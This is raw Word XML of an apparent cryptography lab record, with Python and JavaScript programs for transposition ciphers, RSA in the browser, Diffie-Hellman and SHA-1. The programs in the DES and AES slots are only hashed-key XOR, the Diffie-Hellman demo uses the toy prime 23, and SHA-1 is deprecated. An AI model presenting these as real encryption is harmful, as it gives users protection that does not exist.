    <w:p w14:paraId="26FF416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direction = -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297C4CCE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row += direction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B4C8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# Fill the fence with ciphertext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D2F09F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r in range(num_rails):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3765ABA0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for c in range(len(cipher)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5275E4E1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if fence[r][c] == '*' and idx &lt; len(cipher):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDA632F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    fence[r][c] = cipher[idx]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481BB49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lastRenderedPageBreak/>
        <w:t xml:space="preserve">                idx += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EB559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# Read the message in zigzag order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043ED10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result = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4DCB7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row, direction = 0, 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF4520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i in range(len(cipher)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DFB2EE7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result.append(fence[row][i])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="284350D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if row == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398080B3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direction = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D628E6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elif row == num_rails - 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEBB92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direction = -1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712BC0F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row += direction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3696F131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''.join(result)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AFAB7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9518C5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### Columnar Transposition (Row &amp; Column) ###</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18826BA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columnar_encrypt(text, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E67E0E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text = text.replace(" ", "")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522B9020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num_cols = len(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C44FAC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num_rows = -(-len(text) // num_cols)  # Ceiling division</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D55BEB9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padded = text.ljust(num_rows * num_cols, 'X')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D82809E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matrix = [padded[i*num_cols:(i+1)*num_cols] for i in range(num_rows)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228D1D3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order = sorted(range(len(key)), key=lambda k: key[k])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AA5BAF1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cipher = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630176BB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col in order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A34D334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for row in matrix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6797419D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cipher += row[col]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BD0811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cipher</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEB3A7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012E82E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columnar_decrypt(cipher, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705FCC8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num_cols = len(key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26371CC2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num_rows = -(-len(cipher) // num_cols)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B57144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order = sorted(range(len(key)), key=lambda k: key[k])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B1741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matrix = [[''] * num_cols for _ in range(num_rows)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20BF1B61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idx = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8A123B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col in order:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA51E6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for row in range(num_rows):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4554D70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if idx &lt; len(cipher):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CAAFD0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    matrix[row][col] = cipher[idx]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C7B13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        idx += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE5EE4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plain = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF32A8E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for row in matrix:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B460BA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    plain += "".join(row)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEFA2EC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plain.rstrip("X")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074A326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447C0D6E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main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661C0C66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text = "HELLO TRANSPOSITION"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D14A44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rails = 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEF4854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print("Rail Fence Cipher:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B6A71E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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    enc_rf = rail_fence_encrypt(text, rails)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B35F340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print("Encrypted:", enc_rf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC1D7C9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print("Decrypted:", rail_fence_decrypt(enc_rf, rails))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A80057A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5EC96D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print("\nColumnar Transposition:")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B62259A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 = "4312"  # Using string digits as key order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4957F8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enc_col = columnar_encrypt(text, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC0827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print("Encrypted:", enc_col)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0359B9A5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print("Decrypted:", columnar_decrypt(enc_col, key))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24339B14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</w:p>
    <w:p w14:paraId="6AD10137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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B071541" w14:textId="6F288899" w:rsidR="002A71B5" w:rsidRDefault="002A71B5" w:rsidP="002A71B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800"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main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762562D6" w14:textId="77777777" w:rsidR="002A71B5" w:rsidRPr="002A71B5" w:rsidRDefault="002A71B5" w:rsidP="002A71B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1800"/>
        </w:tabs>
        <w:spacing w:line="293" w:lineRule="exact"/>
        <w:ind w:left="1800" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E02E701" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="002A71B5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line="276" w:lineRule="exact"/>
        <w:ind w:left="1079" w:hanging="359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applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220D0B31" w14:textId="77777777" w:rsidR="002A71B5" w:rsidRDefault="002A71B5" w:rsidP="002A71B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="exact"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A1B1A54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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCDFCE1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import base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="756B20F2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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBE29F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</w:p>
    <w:p w14:paraId="7391A73B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xor_encrypt(plaintext, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C9687D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print(f"Encrypting: '{plaintext}' with key (hex): {key.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABA462D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key_hash = hashlib.sha256(key).digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2722D9C2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ciphertext = bytes(a ^ b for a, b in zip(plaintext.encode(), key_hash * (len(plaintext) // len(key_hash) + 1)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F089DCC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encoded = base64.b64encode(ciphertext).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089A8F67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print(f"Encrypted (hex): {ciphertext.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7C124C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encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED6CA12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</w:p>
    <w:p w14:paraId="0112F3ED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xor_decrypt(ciphertext, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F248757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print(f"Decrypting (Base64): {ciphertext}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4768EFF2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decoded = base64.b64decode(ciphertext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC9E5F7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key_hash = hashlib.sha256(key).digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F880069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plaintext = bytes(a ^ b for a, b in zip(decoded, key_hash * (len(decoded) // len(key_hash) + 1)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F848127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result = plaintext.decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595B9A2C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print(f"Decrypted: '{result}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A365E21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result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5F128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</w:p>
    <w:p w14:paraId="7EC144D9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main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577B3750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 = b"8bytekey"  # Same key length as DES</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05D9FF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plaintext = "Secret message DES"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5488CE9F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print(f"Starting with plaintext: '{plaintext}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6B9270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ciphertext = xor_encrypt(plaintext, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDDA302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print(f"Result (Base64): {ciphertext}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC37923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decrypted = xor_decrypt(ciphertext, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0B25D5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print(f"Final decrypted: '{decrypted}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B7285B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</w:p>
    <w:p w14:paraId="62940BF0" w14:textId="77777777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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6563B6C4" w14:textId="649AF111" w:rsidR="002A71B5" w:rsidRPr="002A71B5" w:rsidRDefault="002A71B5" w:rsidP="002A71B5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="276" w:lineRule="exact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main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4064ED13" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="002A71B5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before="137"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B5C79A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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7271A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import base64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1063E737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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A9E97E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086F6FAD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xor_encrypt(plaintext, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361BFEB7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print(f"Encrypting: '{plaintext}' with key (hex): {key.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B07752A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key_hash = hashlib.sha256(key).digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1826BF6D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ciphertext = bytes(a ^ b for a, b in zip(plaintext.encode(), key_hash * (len(plaintext) // len(key_hash) + 1)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218A731E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encoded = base64.b64encode(ciphertext).decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="576F1A6B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print(f"Encrypted (hex): {ciphertext.hex()}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C555083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encoded</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFEA308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76C143E4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xor_decrypt(ciphertext, key):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F5687CC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print(f"Decrypting (Base64): {ciphertext}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A4949E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decoded = base64.b64decode(ciphertext)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E666CF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key_hash = hashlib.sha256(key).digest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2303053E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plaintext = bytes(a ^ b for a, b in zip(decoded, key_hash * (len(decoded) // len(key_hash) + 1)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ECE0AF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result = plaintext.decode()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B746627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print(f"Decrypted: '{result}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7FB212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return result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDF3674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7A38D8C7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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E145EC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key = b"thisisakey123456"  # 16-byte key, matching AES-128 length</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4463D8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plaintext = "Sensitive AES message"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB75213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print(f"Starting with plaintext: '{plaintext}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD47F5C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ciphertext = xor_encrypt(plaintext, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1626F22C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print(f"Result (Base64): {ciphertext}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F253E4D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decrypted = xor_decrypt(ciphertext, key)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D3F248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 xml:space="preserve">    print(f"Final decrypted: '{decrypted}'")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180273A0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311A6ED6" w14:textId="77777777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t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C7726" w14:textId="5E1ACA94" w:rsidR="002A71B5" w:rsidRPr="002A71B5" w:rsidRDefault="002A71B5" w:rsidP="002A71B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2A71B5">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AE7D853" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="002A71B5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before="139"/>
        <w:ind w:left="1079" w:hanging="359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JavaScript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5557EDA9" w14:textId="59F5FE12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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294558BF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&lt;html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="646A5487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&lt;head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E39A146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&lt;meta charset="UTF-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63ECD949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&lt;title&gt;RSA Encryption/Decryption Demo&lt;/title&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1058C41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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3866DEB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&lt;body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7B4688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&lt;h2&gt;RSA Encryption/Decryption Demo&lt;/h2&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4DBBC0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&lt;button id="generate"&gt;Generate RSA Keys&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A28A79E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&lt;button id="encrypt" disabled&gt;Encrypt Message&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B31D55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&lt;button id="decrypt" disabled&gt;Decrypt Message&lt;/button&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="767923E9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&lt;br&gt;&lt;br&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2063A047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&lt;textarea id="message" rows="4" cols="50" placeholder="Enter message"&gt;&lt;/textarea&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2908765F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&lt;h3&gt;Encrypted Message (space-separated numbers):&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B1E54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&lt;textarea id="encrypted" rows="4" cols="50" readonly&gt;&lt;/textarea&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B62C5C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&lt;h3&gt;Decrypted Message:&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D0B58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&lt;textarea id="decrypted" rows="4" cols="50" readonly&gt;&lt;/textarea&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD0589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</w:p>
    <w:p w14:paraId="42E3E90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&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6EBC2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let publicKey, privateKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F3425FC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document.getElementById('generate').addEventListener('click', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA23940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keyPair = await window.crypto.subtle.generateKey(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007AF3BE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{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E568F0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name: "RSA-OAEP",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F77969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modulusLength: 2048,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF9754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publicExponent: new Uint8Array([1, 0, 1]),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23158CA9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hash: "SHA-256",</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC1F96D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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088A8FC3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true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B9D20E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["encrypt", "decrypt"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BC2EFD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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B6379D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lastRenderedPageBreak/>
        <w:t>      publicKey = keyPair.publicKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02456C4C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privateKey = keyPair.privateKey;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C584E8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document.getElementById('encrypt').disabled = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C8EC8F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document.getElementById('decrypt').disabled = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1127E2D3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alert("RSA keys generated.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423566F5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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BBA896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</w:p>
    <w:p w14:paraId="5B3F455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document.getElementById('encrypt').addEventListener('click', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25538241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encoder = new TextEncoder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB8D02F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data = encoder.encode(document.getElementById('message').value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40174303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encryptedData = await window.crypto.subtle.encrypt(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57729CCF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{ name: "RSA-OAEP" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F69F6B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publicKey,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4EAD21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data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27549BFD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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F0F9F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encryptedArray = new Uint8Array(encryptedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB1AC3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document.getElementById('encrypted').value = Array.from(encryptedArray).join(" ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01291BE5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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211FC62F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</w:p>
    <w:p w14:paraId="5B02B01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document.getElementById('decrypt').addEventListener('click', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1129945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encryptedText = document.getElementById('encrypted').value.trim();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032BCDA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const encryptedArray = new Uint8Array(encryptedText.split(" ").map(Number));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427C6A09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try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39FCBF3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const decryptedData = await window.crypto.subtle.decrypt(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3040EA6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{ name: "RSA-OAEP" },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="456CBB65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privateKey,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DECF3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  encryptedArray</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69582F9E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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7727BEA6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const decoder = new TextDecoder();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC9E8FB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document.getElementById('decrypted').value = decoder.decode(decryptedData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFBB6A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} catch(e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599A2956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  document.getElementById('decrypted').value = "Decryption failed.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A30A2D6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    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E39003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lastRenderedPageBreak/>
        <w:t>    });</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63187344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  &lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C0AF00A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&lt;/body&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA77E89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  <w:r w:rsidRPr="002A71B5">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>&lt;/html&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56AE0B82" w14:textId="7777777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  <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71F513B9" w14:textId="6DFC6DD7" w:rsidR="002A71B5" w:rsidRPr="002A71B5" w:rsidRDefault="002A71B5" w:rsidP="002A71B5">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="139"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B62F3F8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="00541377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before="137"/>
        <w:ind w:left="1079" w:hanging="359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Diffie-Hellman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given </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>problem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="113EB926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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E519CE8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import random</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BFD34CF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</w:p>
    <w:p w14:paraId="0BDF8DBB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# Use a large prime number (for simplicity, a small prime is used here)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4CF453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# In practice, use a large safe prime</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1545C486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p = 23   # prime modulus (example value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3090F287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g = 5    # primitive root modulo p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B4FCD2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</w:p>
    <w:p w14:paraId="1153E955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def diffie_hellman():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B2B265D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# Private keys: randomly choose integers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216B9860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a = random.randint(1, p-2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37C16581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b = random.randint(1, p-2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115FDC69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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259753C1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# Public keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3974E203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A = pow(g, a, p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540F7131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B = pow(g, b, p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76586A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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2ABEC3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print("Party A private key:", a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E51A2D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print("Party B private key:", b)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A1A4C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print("Party A public key:", A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E3FA94D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print("Party B public key:", B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4EEB0D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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9C4A22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# Shared secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD4D04A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shared_A = pow(B, a, p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2247B433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shared_B = pow(A, b, p)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D8D22F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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20041DC2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    print("Shared secret computed by A:", shared_A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F6564B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print("Shared secret computed by B:", shared_B)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D596BA3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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A8337BC" w14:textId="77777777" w:rsidR="00541377" w:rsidRPr="00541377" w:rsidRDefault="00541377" w:rsidP="00541377">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="137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if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC79380" w14:textId="46FE1A50" w:rsidR="00541377" w:rsidRPr="00541377" w:rsidRDefault="00541377" w:rsidP="00541377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diffie_hellman()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3648D7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="00541377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before="139"/>
        <w:ind w:left="1079" w:hanging="359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digest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SHA-1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>algorithm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5263B9C1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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56DA1374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import hashlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07292A07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</w:p>
    <w:p w14:paraId="513DFCB3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def sha1_digest(text):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521434AB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sha1 = hashlib.sha1()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C35758F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sha1.update(text.encode('utf-8'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EBEF4D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return sha1.hexdigest()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B483CA8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</w:p>
    <w:p w14:paraId="2D4BD126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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50A369A8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text = input("Enter text to hash with SHA-1: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28193D7B" w14:textId="77777777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digest = sha1_digest(text)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA2439E" w14:textId="6B585D4A" w:rsidR="00541377" w:rsidRPr="00541377" w:rsidRDefault="00541377" w:rsidP="00541377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541377">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("SHA-1 Digest:", digest)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5395081E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="00541377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before="137"/>
